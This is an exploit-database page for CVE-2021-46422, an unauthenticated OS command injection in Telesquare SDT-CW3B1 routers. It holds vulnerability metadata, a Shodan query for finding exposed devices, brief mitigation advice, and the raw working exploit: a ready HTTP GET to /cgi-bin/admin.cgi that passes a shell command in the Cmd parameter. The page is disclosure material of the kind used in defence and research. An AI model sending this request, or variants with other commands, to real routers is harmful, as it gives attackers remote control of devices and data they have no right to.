header-logo
Suggest Exploit
vendor:
SDT-CW3B1
by:
Ahmed Alroky
9.8
CVSS
CRITICAL
OS command injection
78
CWE
Product Name: SDT-CW3B1
Affected Version From: 1.0.0
Affected Version To: 1.1.2000
Patch Exists: YES
Related CWE: CVE-2021-46422
CPE: a:telesquare:sdt-cw3b1:1.1.0
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2021,telesquare,rce,router,injection,edb
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'html:"SDT-CW3B1"', 'verified': True, 'vendor': 'telesquare', 'product': 'sdt-cs3b1_firmware'}
Platforms Tested: Windows
2022

SDT-CW3B1 1.1.0 – OS command injection

This exploit allows an attacker to execute arbitrary operating system commands on the target system. By sending a specially crafted HTTP request to the vulnerable CGI script, the attacker can inject malicious commands into the command parameter, which will be executed by the server. This can lead to unauthorized access, data leakage, and potential remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. Additionally, input validation and sanitization should be implemented in the vulnerable CGI script to prevent command injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422

# Tested on: Windows

# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close